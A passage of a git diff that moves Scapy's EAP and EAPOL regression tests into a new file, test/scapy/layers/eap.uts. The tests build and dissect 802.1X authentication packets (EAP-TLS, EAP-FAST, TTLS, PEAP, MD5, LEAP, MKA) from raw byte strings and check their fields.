-eapol = EAPOL(s) -assert(eapol.version == 3) -assert(eapol.type == 5) -assert(eapol.len == 148) -assert(eapol.haslayer(MKAPDU)) -assert(eapol[MKAPDU].basic_param_set.actor_member_id == b'\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7') -assert(eapol.haslayer(MKASAKUseParamSet)) -assert(eapol[MKAPDU][MKASAKUseParamSet].latest_key_key_server_member_id == b"q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6") -assert(eapol.haslayer(MKALivePeerListParamSet)) -assert(eapol[MKAPDU][MKALivePeerListParamSet].member_id_message_num[0].member_id == b"q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6") -assert(eapol[MKAPDU].haslayer(MKAICVSet)) -assert(eapol[MKAPDU][MKAICVSet].icv == b"OF\x84\xf1@%\x95\xe6Fw9\x1a\xfa\x03(\xae") - -= EAPOL-MKA - With Distributed SAK parameter set - Dissection -eapol = None -s = b"\x03\x05\x00\xb4\x01\x10\xe0<\xccN$\xc4\xf7\x7f\x00\x80q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6\x00\x00\x00\x81\x00\x80\xc2\x01\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x01\x00\x00\x10\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7\x00\x00\x00\x02\x03\x10\x00(q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x10\x00\x1c\x00\x00\x00\x01Cz\x05\x88\x9f\xe8-\x94W+?\x13~\xfb\x016yVB?\xbd\xa1\x9fu\xff\x00\x00\x10\xb0H\xcf\xe0:\xa1\x94RD'\x03\xe67\xe1Ur" -eapol = EAPOL(s) -assert(eapol.version == 3) -assert(eapol.type == 5) -assert(eapol.len == 180) -assert(eapol.haslayer(MKAPDU)) -assert(eapol[MKAPDU].basic_param_set.actor_member_id == b"q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6") -assert(eapol.haslayer(MKASAKUseParamSet)) -assert(eapol[MKAPDU][MKASAKUseParamSet].latest_key_key_server_member_id == b"q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6") -assert(eapol.haslayer(MKALivePeerListParamSet)) -assert(eapol[MKAPDU][MKALivePeerListParamSet].member_id_message_num[0].member_id == b"\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7") -assert(eapol.haslayer(MKADistributedSAKParamSet)) -assert(eapol[MKADistributedSAKParamSet].sak_aes_key_wrap == b"Cz\x05\x88\x9f\xe8-\x94W+?\x13~\xfb\x016yVB?\xbd\xa1\x9fu") -assert(eapol[MKAPDU].haslayer(MKAICVSet)) -assert(eapol[MKAPDU][MKAICVSet].icv == b"\xb0H\xcf\xe0:\xa1\x94RD'\x03\xe67\xe1Ur") - - -############ -############ -############ -+ EAP class tests - -= EAP - Basic Instantiation -raw(EAP()) == b'\x04\x00\x00\x04' - -= EAP - Instantiation with specific values -raw(EAP(code = 1, id = 1, len = 5, type = 1)) == b'\x01\x01\x00\x05\x01' - -= EAP - Instantiation - Multiple desired authentication types -raw(EAP(code=2, type=3, desired_auth_types=[13,21,25,43])) == b'\x02\x00\x00\t\x03\r\x15\x19+' - -= EAP - Dissection (1) -s = b'\x01\x01\x00\x05\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -eap = EAP(s) -assert(eap.code == 1) -assert(eap.id == 1) -assert(eap.len == 5) -assert(hasattr(eap, "type")) -assert(eap.type == 1) - -= EAP - Dissection (2) -s = b'\x02\x01\x00\x0e\x01anonymous\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -eap = EAP(s) -assert(eap.code == 2) -assert(eap.id == 1) -assert(eap.len == 14) -assert(eap.type == 1) -assert(hasattr(eap, 'identity')) -assert(eap.identity == b'anonymous') - -= EAP - Dissection (3) -s = b'\x01\x01\x00\x06\r ' -eap = EAP(s) -assert(eap.code == 1) -assert(eap.id == 1) -assert(eap.len == 6) -assert(eap.type == 13) -assert(eap.haslayer(EAP_TLS)) -assert(eap[EAP_TLS].L == 0) -assert(eap[EAP_TLS].M == 0) -assert(eap[EAP_TLS].S == 1) - -= EAP - Dissection (4) -s = b'\x02\x01\x00\xd1\r\x00\x16\x03\x01\x00\xc6\x01\x00\x00\xc2\x03\x01UK\x02\xdf\x1e\xde5\xab\xfa[\x15\xef\xbe\xa2\xe4`\xc6g\xb9\xa8\xaa%vAs\xb2\x1cXt\x1c0\xb7\x00\x00P\xc0\x14\xc0\n\x009\x008\x00\x88\x00\x87\xc0\x0f\xc0\x05\x005\x00\x84\xc0\x12\xc0\x08\x00\x16\x00\x13\xc0\r\xc0\x03\x00\n\xc0\x13\xc0\t\x003\x002\x00\x9a\x00\x99\x00E\x00D\xc0\x0e\xc0\x04\x00/\x00\x96\x00A\xc0\x11\xc0\x07\xc0\x0c\xc0\x02\x00\x05\x00\x04\x00\x15\x00\x12\x00\t\x00\xff\x01\x00\x00I\x00\x0b\x00\x04\x03\x00\x01\x02\x00\n\x004\x002\x00\x0e\x00\r\x00\x19\x00\x0b\x00\x0c\x00\x18\x00\t\x00\n\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07\x00\x14\x00\x15\x00\x04\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02\x00\x03\x00\x0f\x00\x10\x00\x11\x00#\x00\x00\x00\x0f\x00\x01\x01' -eap = EAP(s) -assert(eap.code == 2) -assert(eap.id == 1) -assert(eap.len == 209) -assert(eap.type == 13) -assert(eap.haslayer(EAP_TLS)) -assert(eap[EAP_TLS].L == 0) -assert(eap[EAP_TLS].M == 0) -assert(eap[EAP_TLS].S == 0) - -= EAP - Dissection (5) -s = b'\x02\x9e\x00<+\x01\x16\x03\x01\x001\x01\x00\x00-\x03\x01dr1\x93ZS\x0en\xad\x1f\xbaH\xbb\xfe6\xe6\xd0\xcb\xec\xd7\xc0\xd7\xb9\xa5\xc9\x0c\xfd\x98o\xa7T \x00\x00\x04\x004\x00\x00\x01\x00\x00\x00' -eap = EAP(s) -assert(eap.code == 2) -assert(eap.id == 158) -assert(eap.len == 60) -assert(eap.type == 43) -assert(eap.haslayer(EAP_FAST)) -assert(eap[EAP_FAST].L == 0) -assert(eap[EAP_FAST].M == 0) -assert(eap[EAP_FAST].S == 0) -assert(eap[EAP_FAST].version == 1) - -= EAP - Dissection (6) -s = b'\x02\x9f\x01L+\x01\x16\x03\x01\x01\x06\x10\x00\x01\x02\x01\x00Y\xc9\x8a\tcw\t\xdcbU\xfd\x035\xcd\x1a\t\x10f&[(9\xf6\x88W`\xc6\x0f\xb3\x84\x15\x19\xf5\tk\xbd\x8fp&0\xb0\xa4B\x85\x0c<:s\xf2zT\xc3\xbd\x8a\xe4D{m\xe7\x97\xfe>\xda\x14\xb8T1{\xd7H\x9c\xa6\xcb\xe3,u\xdf\xe0\x82\xe5R\x1e<\xe5\x03}\xeb\x98\xe2\xf7\x8d3\xc6\x83\xac"\x8f\xd7\x12\xe5{:"\x84A\xd9\x14\xc2cZF\xd4\t\xab\xdar\xc7\xe0\x0e\x00o\xce\x05g\xdc?\xcc\xf7\xe83\x83E\xb3>\xe8<3-QB\xfd$C/\x1be\xcf\x03\xd6Q4\xbe\\h\xba)<\x99N\x89\xd9\xb1\xfa!\xd7a\xef\xa3\xd3o\xed8Uz\xb5k\xb0`\xfeC\xbc\xb3aS,d\xe6\xdc\x13\xa4A\x1e\x9b\r{\xd6s \xd0cQ\x95y\xc8\x1d\xc3\xd9\x87\xf2=\x81\x96q~\x99E\xc3\x97\xa8px\xe2\xc7\x92\xeb\xff/v\x84\x1e\xfb\x00\x95#\xba\xfb\xd88h\x90K\xa7\xbd9d\xb4\xf2\xf2\x14\x02vtW\xaa\xadY\x14\x03\x01\x00\x01\x01\x16\x03\x01\x000\x97\xc5l\xd6\xef\xffcM\x81\x90Q\x96\xf6\xfeX1\xf7\xfc\x84\xc6\xa0\xf6Z\xcd\xb6\xe1\xd4\xdb\x88\xf9t%Q!\xe7,~#2G-\xdf\x83\xbf\x86Q\xa2$' -eap = EAP(s) -assert(eap.code == 2) -assert(eap.id == 159) -assert(eap.len == 332) -assert(eap.type == 43) -assert(eap.haslayer(EAP_FAST)) -assert(eap[EAP_FAST].L == 0) -assert(eap[EAP_FAST].M == 0) -assert(eap[EAP_FAST].S == 0) -assert(eap[EAP_FAST].version == 1) - -= EAP - Dissection (7) -s = b'\x02\xf1\x00\t\x03\r\x15\x19+' -eap = EAP(s) -assert(eap.code == 2) -assert(eap.id == 241) -assert(eap.len == 9) -assert(eap.type == 3) -assert(hasattr(eap, 'desired_auth_types')) -assert(eap.desired_auth_types == [13,21,25,43]) - -= EAP - Dissection (8) -s = b"\x02\x03\x01\x15\x15\x00\x16\x03\x01\x01\n\x01\x00\x01\x06\x03\x03\xd5\xd9\xd5rT\x9e\xb8\xbe,>\xcf!\xcf\xc7\x02\x8c\xb1\x1e^F\xf7\xc84\x8c\x01t4\x91[\x02\xc8/\x00\x00\x8c\xc00\xc0,\xc0(\xc0$\xc0\x14\xc0\n\x00\xa5\x00\xa3\x00\xa1\x00\x9f\x00k\x00j\x00i\x00h\x009\x008\x007\x006\x00\x88\x00\x87\x00\x86\x00\x85\xc02\xc0.\xc0*\xc0&\xc0\x0f\xc0\x05\x00\x9d\x00=\x005\x00\x84\xc0/\xc0+\xc0'\xc0#\xc0\x13\xc0\t\x00\xa4\x00\xa2\x00\xa0\x00\x9e\x00g\x00@\x00?\x00>\x003\x002\x001\x000\x00\x9a\x00\x99\x00\x98\x00\x97\x00E\x00D\x00C\x00B\xc01\xc0-\xc0)\xc0%\xc0\x0e\xc0\x04\x00\x9c\x00<\x00/\x00\x96\x00A\x00\xff\x01\x00\x00Q\x00\x0b\x00\x04\x03\x00\x01\x02\x00\n\x00\x1c\x00\x1a\x00\x17\x00\x19\x00\x1c\x00\x1b\x00\x18\x00\x1a\x00\x16\x00\x0e\x00\r\x00\x0b\x00\x0c\x00\t\x00\n\x00\r\x00 \x00\x1e\x06\x01\x06\x02\x06\x03\x05\x01\x05\x02\x05\x03\x04\x01\x04\x02\x04\x03\x03\x01\x03\x02\x03\x03\x02\x01\x02\x02\x02\x03\x00\x0f\x00\x01\x01" -eap = EAP(s) -assert(eap.code == 2) -assert(eap.id == 3) -assert(eap.len == 277) -assert(eap.type == 21) -assert(eap.haslayer(EAP_TTLS)) -assert(eap[EAP_TTLS].L == 0) -assert(eap[EAP_TTLS].M == 0) -assert(eap[EAP_TTLS].S == 0) -assert(eap[EAP_TTLS].version == 0) - -= EAP - EAP_TLS - Basic Instantiation -raw(EAP_TLS()) == b'\x01\x00\x00\x06\r\x00' - -= EAP - EAP_FAST - Basic Instantiation -raw(EAP_FAST()) == b'\x01\x00\x00\x06+\x00' - -= EAP - EAP_TTLS - Basic Instantiation -raw(EAP_TTLS()) == b'\x01\x00\x00\x06\x15\x00' - -= EAP - EAP_PEAP - Basic Instantiation -raw(EAP_PEAP()) == b'\x01\x00\x00\x06\x19\x01' - -= EAP - EAP_MD5 - Basic Instantiation -raw(EAP_MD5()) == b'\x01\x00\x00\x06\x04\x00' - -= EAP - EAP_MD5 - Request - Dissection (8) -s = b'\x01\x02\x00\x16\x04\x10\x86\xf9\x89\x94\x81\x01\xb3 nHh\x1b\x8d\xe7^\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -eap = EAP(s) -assert(eap.code == 1) -assert(eap.id == 2) -assert(eap.len == 22) -assert(eap.type == 4) -assert(eap.haslayer(EAP_MD5)) -assert(eap[EAP_MD5].value_size == 16) -assert(eap[EAP_MD5].value == b'\x86\xf9\x89\x94\x81\x01\xb3 nHh\x1b\x8d\xe7^\xdb') -assert(eap[EAP_MD5].optional_name == b'') - -= EAP - EAP_MD5 - Response - Dissection (9) -s = b'\x02\x02\x00\x16\x04\x10\xfd\x1e\xffe\xf5\x80y\xa8\xe3\xc8\xf1\xbd\xc2\x85\xae\xcf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -eap = EAP(s) -assert(eap.code == 2) -assert(eap.id == 2) -assert(eap.len == 22) -assert(eap.type == 4) -assert(eap.haslayer(EAP_MD5)) -assert(eap[EAP_MD5].value_size == 16) -assert(eap[EAP_MD5].value == b'\xfd\x1e\xffe\xf5\x80y\xa8\xe3\xc8\xf1\xbd\xc2\x85\xae\xcf') -assert(eap[EAP_MD5].optional_name == b'') - -= EAP - LEAP - Basic Instantiation -raw(LEAP()) == b'\x01\x00\x00\x08\x11\x01\x00\x00' - -= EAP - LEAP - Request - Dissection (10) -s = b'\x01D\x00\x1c\x11\x01\x00\x088\xb6\xd7\xa1E\x9a9\x8a[\x91\xe1U\xfa\xb6H\xd1\xbd\x9b\xd5\xadl\rV\x00\x00\x02\x00/\x01\x00' -eap = EAP_PEAP(s) -assert(eap.code == 2) -assert(eap.id == 3) -assert(eap.len == 56) -assert(eap.type == 25) -assert(eap.haslayer(EAP_PEAP)) -assert(eap[EAP_PEAP].S == 0) -assert(eap[EAP_PEAP].version == 1) -assert(hasattr(eap[EAP_PEAP], "tls_data")) - -= EAP - Layers (1) -eap = EAP_MD5() -assert(EAP_MD5 in eap) -assert(not EAP_TLS in eap) -assert(not EAP_FAST in eap) -assert(not LEAP in eap) -assert(EAP in eap) -eap = EAP_TLS() -assert(EAP_TLS in eap) -assert(not EAP_MD5 in eap) -assert(not EAP_FAST in eap) -assert(not LEAP in eap) -assert(EAP in eap) -eap = EAP_FAST() -assert(EAP_FAST in eap) -assert(not EAP_MD5 in eap) -assert(not EAP_TLS in eap) -assert(not LEAP in eap) -assert(EAP in eap) -eap = EAP_TTLS() -assert(EAP_TTLS in eap) -assert(not EAP_MD5 in eap) -assert(not EAP_TLS in eap) -assert(not EAP_FAST in eap) -assert(not LEAP in eap) -assert(EAP in eap) -eap = EAP_PEAP() -assert(EAP_PEAP in eap) -assert(EAP in eap) -eap = LEAP() -assert(not EAP_MD5 in eap) -assert(not EAP_TLS in eap) -assert(not EAP_FAST in eap) -assert(LEAP in eap) -assert(EAP in eap) - -= EAP - Layers (2) -eap = EAP_MD5() -assert(type(eap[EAP]) == EAP_MD5) -eap = EAP_TLS() -assert(type(eap[EAP]) == EAP_TLS) -eap = EAP_FAST() -assert(type(eap[EAP]) == EAP_FAST) -eap = EAP_TTLS() -assert(type(eap[EAP]) == EAP_TTLS) -eap = EAP_PEAP() -assert(type(eap[EAP]) == EAP_PEAP) -eap = LEAP() -assert(type(eap[EAP]) == LEAP) - -= EAP - sessions (1) -p = IP()/TCP()/EAP() -l = PacketList(p) -s = l.sessions() # Crashed on commit: e42ecdc54556c4852ca06b1a6da6c1ccbf3f522e -assert len(s) == 1 - -= EAP - sessions (2) -p = IP()/UDP()/EAP() -l = PacketList(p) -s = l.sessions() # Crashed on commit: e42ecdc54556c4852ca06b1a6da6c1ccbf3f522e -assert len(s) == 1 - ############ ############ diff --git a/test/scapy/layers/eap.uts b/test/scapy/layers/eap.uts new file mode 100644 index 00000000000..4c2f14aa9d2 --- /dev/null +++ b/test/scapy/layers/eap.uts @@ -0,0 +1,393 @@ +% EAP regression tests for Scapy + +############ +############ ++ EAPOL class tests + += EAPOL - Basic Instantiation +raw(EAPOL()) == b'\x01\x00\x00\x00' + += EAPOL - Instantiation with specific values +raw(EAPOL(version = 3, type = 5)) == b'\x03\x05\x00\x00' + += EAPOL - Dissection (1) +s = b'\x03\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +eapol = EAPOL(s) +assert(eapol.version == 3) +assert(eapol.type == 1) +assert(eapol.len == 0) + += EAPOL - Dissection (2) +s = b'\x03\x00\x00\x05\x01\x01\x00\x05\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +eapol = EAPOL(s) +assert(eapol.version == 3) +assert(eapol.type == 0) +assert(eapol.len == 5) + += EAPOL - Dissection (3) +s = b'\x03\x00\x00\x0e\x02\x01\x00\x0e\x01anonymous\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +eapol = EAPOL(s) +assert(eapol.version == 3) +assert(eapol.type == 0) +assert(eapol.len == 14) + += EAPOL - Dissection (4) +req = EAPOL(b'\x03\x00\x00\x05\x01\x01\x00\x05\x01') +ans = EAPOL(b'\x03\x00\x00\x0e\x02\x01\x00\x0e\x01anonymous') +ans.answers(req) + += EAPOL - Dissection (5) +s = b'\x02\x00\x00\x06\x01\x01\x00\x06\r ' +eapol = EAPOL(s) +assert(eapol.version == 2) +assert(eapol.type == 0) +assert(eapol.len == 6) +assert(eapol.haslayer(EAP_TLS)) + += EAPOL - Dissection (6) +s = b'\x03\x00\x00<\x02\x9e\x00<+\x01\x16\x03\x01\x001\x01\x00\x00-\x03\x01dr1\x93ZS\x0en\xad\x1f\xbaH\xbb\xfe6\xe6\xd0\xcb\xec\xd7\xc0\xd7\xb9\xa5\xc9\x0c\xfd\x98o\xa7T \x00\x00\x04\x004\x00\x00\x01\x00\x00\x00' +eapol = EAPOL(s) +assert(eapol.version == 3) +assert(eapol.type == 0) +assert(eapol.len == 60) +assert(eapol.haslayer(EAP_FAST)) + + +############ +############ ++ EAPOL-MKA class tests + += EAPOL-MKA - With Basic parameter set - Dissection +eapol = None +s = b'\x03\x05\x00T\x01\xff\xf0<\x00Bh\xa8\x1e\x03\x00\n\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7\x00\x00\x00\x01\x00\x80\xc2\x01\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xff\x00\x00\x10\xe5\xf5j\x86V\\\xb1\xcc\xa9\xb95\x04m*Cj' +eapol = EAPOL(s) +assert(eapol.version == 3) +assert(eapol.type == 5) +assert(eapol.len == 84) +assert(eapol.haslayer(MKAPDU)) +assert(eapol[MKAPDU].basic_param_set.actor_member_id == b"\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7") +assert(eapol[MKAPDU].haslayer(MKAICVSet)) +assert(eapol[MKAPDU][MKAICVSet].icv == b"\xe5\xf5j\x86V\\\xb1\xcc\xa9\xb95\x04m*Cj") + + += EAPOL-MKA - With Potential Peer List parameter set - Dissection +eapol = None +s = b'\x03\x05\x00h\x01\x10\xe0<\xccN$\xc4\xf7\x7f\x00\x80q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6\x00\x00\x00}\x00\x80\xc2\x01\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x02\x00\x00\x10\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7\x00\x00\x00\x01\xff\x00\x00\x105\x01\xdc)\xfd\xd1\xff\xd55\x9c_o\xc9\x9c\xca\xc0' +eapol = EAPOL(s) +assert(eapol.version == 3) +assert(eapol.type == 5) +assert(eapol.len == 104) +assert(eapol.haslayer(MKAPDU)) +assert(eapol[MKAPDU].basic_param_set.actor_member_id == b"q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6") +assert(eapol.haslayer(MKAPotentialPeerListParamSet)) +assert(eapol[MKAPDU][MKAPotentialPeerListParamSet].member_id_message_num[0].member_id == b"\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7") +assert(eapol[MKAPDU].haslayer(MKAICVSet)) +assert(eapol[MKAPDU][MKAICVSet].icv == b"5\x01\xdc)\xfd\xd1\xff\xd55\x9c_o\xc9\x9c\xca\xc0") + += EAPOL-MKA - With Live Peer List parameter set - Dissection +eapol = None +s = b"\x03\x05\x00h\x01\xffp<\x00Bh\xa8\x1e\x03\x00\n\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7\x00\x00\x00\x02\x00\x80\xc2\x01\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x01\x00\x00\x10q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6\x00\x00\x00\x80\xff\x00\x00\x10\xf4\xa1d\x18\tD\xa2}\x8e'\x0c/\xda,\xea\xb7" +eapol = EAPOL(s) +assert(eapol.version == 3) +assert(eapol.type == 5) +assert(eapol.len == 104) +assert(eapol.haslayer(MKAPDU)) +assert(eapol[MKAPDU].basic_param_set.actor_member_id == b'\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7') +assert(eapol.haslayer(MKALivePeerListParamSet)) +assert(eapol[MKAPDU][MKALivePeerListParamSet].member_id_message_num[0].member_id == b"q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6") +assert(eapol[MKAPDU].haslayer(MKAICVSet)) +assert(eapol[MKAPDU][MKAICVSet].icv == b"\xf4\xa1d\x18\tD\xa2}\x8e'\x0c/\xda,\xea\xb7") + += EAPOL-MKA - With SAK Use parameter set - Dissection +eapol = None +s = b'\x03\x05\x00\x94\x01\xffp<\x00Bh\xa8\x1e\x03\x00\n\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7\x00\x00\x00\x03\x00\x80\xc2\x01\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x03\x10\x00(q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6\x00\x00\x00\x01\x00\x00\x00\x00q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6\x00\x00\x00\x01\x00\x00\x00\x00\x01\x00\x00\x10q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6\x00\x00\x00\x83\xff\x00\x00\x10OF\x84\xf1@%\x95\xe6Fw9\x1a\xfa\x03(\xae' +eapol = EAPOL(s) +assert(eapol.version == 3) +assert(eapol.type == 5) +assert(eapol.len == 148) +assert(eapol.haslayer(MKAPDU)) +assert(eapol[MKAPDU].basic_param_set.actor_member_id == b'\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7') +assert(eapol.haslayer(MKASAKUseParamSet)) +assert(eapol[MKAPDU][MKASAKUseParamSet].latest_key_key_server_member_id == b"q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6") +assert(eapol.haslayer(MKALivePeerListParamSet)) +assert(eapol[MKAPDU][MKALivePeerListParamSet].member_id_message_num[0].member_id == b"q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6") +assert(eapol[MKAPDU].haslayer(MKAICVSet)) +assert(eapol[MKAPDU][MKAICVSet].icv == b"OF\x84\xf1@%\x95\xe6Fw9\x1a\xfa\x03(\xae") + += EAPOL-MKA - With Distributed SAK parameter set - Dissection +eapol = None +s = b"\x03\x05\x00\xb4\x01\x10\xe0<\xccN$\xc4\xf7\x7f\x00\x80q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6\x00\x00\x00\x81\x00\x80\xc2\x01\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x01\x00\x00\x10\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7\x00\x00\x00\x02\x03\x10\x00(q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x10\x00\x1c\x00\x00\x00\x01Cz\x05\x88\x9f\xe8-\x94W+?\x13~\xfb\x016yVB?\xbd\xa1\x9fu\xff\x00\x00\x10\xb0H\xcf\xe0:\xa1\x94RD'\x03\xe67\xe1Ur" +eapol = EAPOL(s) +assert(eapol.version == 3) +assert(eapol.type == 5) +assert(eapol.len == 180) +assert(eapol.haslayer(MKAPDU)) +assert(eapol[MKAPDU].basic_param_set.actor_member_id == b"q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6") +assert(eapol.haslayer(MKASAKUseParamSet)) +assert(eapol[MKAPDU][MKASAKUseParamSet].latest_key_key_server_member_id == b"q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6") +assert(eapol.haslayer(MKALivePeerListParamSet)) +assert(eapol[MKAPDU][MKALivePeerListParamSet].member_id_message_num[0].member_id == b"\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7") +assert(eapol.haslayer(MKADistributedSAKParamSet)) +assert(eapol[MKADistributedSAKParamSet].sak_aes_key_wrap == b"Cz\x05\x88\x9f\xe8-\x94W+?\x13~\xfb\x016yVB?\xbd\xa1\x9fu") +assert(eapol[MKAPDU].haslayer(MKAICVSet)) +assert(eapol[MKAPDU][MKAICVSet].icv == b"\xb0H\xcf\xe0:\xa1\x94RD'\x03\xe67\xe1Ur") + + +############ +############ +############ ++ EAP class tests + += EAP - Basic Instantiation +raw(EAP()) == b'\x04\x00\x00\x04' + += EAP - Instantiation with specific values +raw(EAP(code = 1, id = 1, len = 5, type = 1)) == b'\x01\x01\x00\x05\x01' + += EAP - Instantiation - Multiple desired authentication types +raw(EAP(code=2, type=3, desired_auth_types=[13,21,25,43])) == b'\x02\x00\x00\t\x03\r\x15\x19+' + += EAP - Dissection (1) +s = b'\x01\x01\x00\x05\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +eap = EAP(s) +assert(eap.code == 1) +assert(eap.id == 1) +assert(eap.len == 5) +assert(hasattr(eap, "type")) +assert(eap.type == 1) + += EAP - Dissection (2) +s = b'\x02\x01\x00\x0e\x01anonymous\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +eap = EAP(s) +assert(eap.code == 2) +assert(eap.id == 1) +assert(eap.len == 14) +assert(eap.type == 1) +assert(hasattr(eap, 'identity')) +assert(eap.identity == b'anonymous') + += EAP - Dissection (3) +s = b'\x01\x01\x00\x06\r ' +eap = EAP(s) +assert(eap.code == 1) +assert(eap.id == 1) +assert(eap.len == 6) +assert(eap.type == 13) +assert(eap.haslayer(EAP_TLS)) +assert(eap[EAP_TLS].L == 0) +assert(eap[EAP_TLS].M == 0) +assert(eap[EAP_TLS].S == 1) + += EAP - Dissection (4) +s = b'\x02\x01\x00\xd1\r\x00\x16\x03\x01\x00\xc6\x01\x00\x00\xc2\x03\x01UK\x02\xdf\x1e\xde5\xab\xfa[\x15\xef\xbe\xa2\xe4`\xc6g\xb9\xa8\xaa%vAs\xb2\x1cXt\x1c0\xb7\x00\x00P\xc0\x14\xc0\n\x009\x008\x00\x88\x00\x87\xc0\x0f\xc0\x05\x005\x00\x84\xc0\x12\xc0\x08\x00\x16\x00\x13\xc0\r\xc0\x03\x00\n\xc0\x13\xc0\t\x003\x002\x00\x9a\x00\x99\x00E\x00D\xc0\x0e\xc0\x04\x00/\x00\x96\x00A\xc0\x11\xc0\x07\xc0\x0c\xc0\x02\x00\x05\x00\x04\x00\x15\x00\x12\x00\t\x00\xff\x01\x00\x00I\x00\x0b\x00\x04\x03\x00\x01\x02\x00\n\x004\x002\x00\x0e\x00\r\x00\x19\x00\x0b\x00\x0c\x00\x18\x00\t\x00\n\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07\x00\x14\x00\x15\x00\x04\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02\x00\x03\x00\x0f\x00\x10\x00\x11\x00#\x00\x00\x00\x0f\x00\x01\x01' +eap = EAP(s) +assert(eap.code == 2) +assert(eap.id == 1) +assert(eap.len == 209) +assert(eap.type == 13) +assert(eap.haslayer(EAP_TLS)) +assert(eap[EAP_TLS].L == 0) +assert(eap[EAP_TLS].M == 0) +assert(eap[EAP_TLS].S == 0) + += EAP - Dissection (5) +s = b'\x02\x9e\x00<+\x01\x16\x03\x01\x001\x01\x00\x00-\x03\x01dr1\x93ZS\x0en\xad\x1f\xbaH\xbb\xfe6\xe6\xd0\xcb\xec\xd7\xc0\xd7\xb9\xa5\xc9\x0c\xfd\x98o\xa7T \x00\x00\x04\x004\x00\x00\x01\x00\x00\x00' +eap = EAP(s) +assert(eap.code == 2) +assert(eap.id == 158) +assert(eap.len == 60) +assert(eap.type == 43) +assert(eap.haslayer(EAP_FAST)) +assert(eap[EAP_FAST].L == 0) +assert(eap[EAP_FAST].M == 0) +assert(eap[EAP_FAST].S == 0) +assert(eap[EAP_FAST].version == 1) + += EAP - Dissection (6) +s = 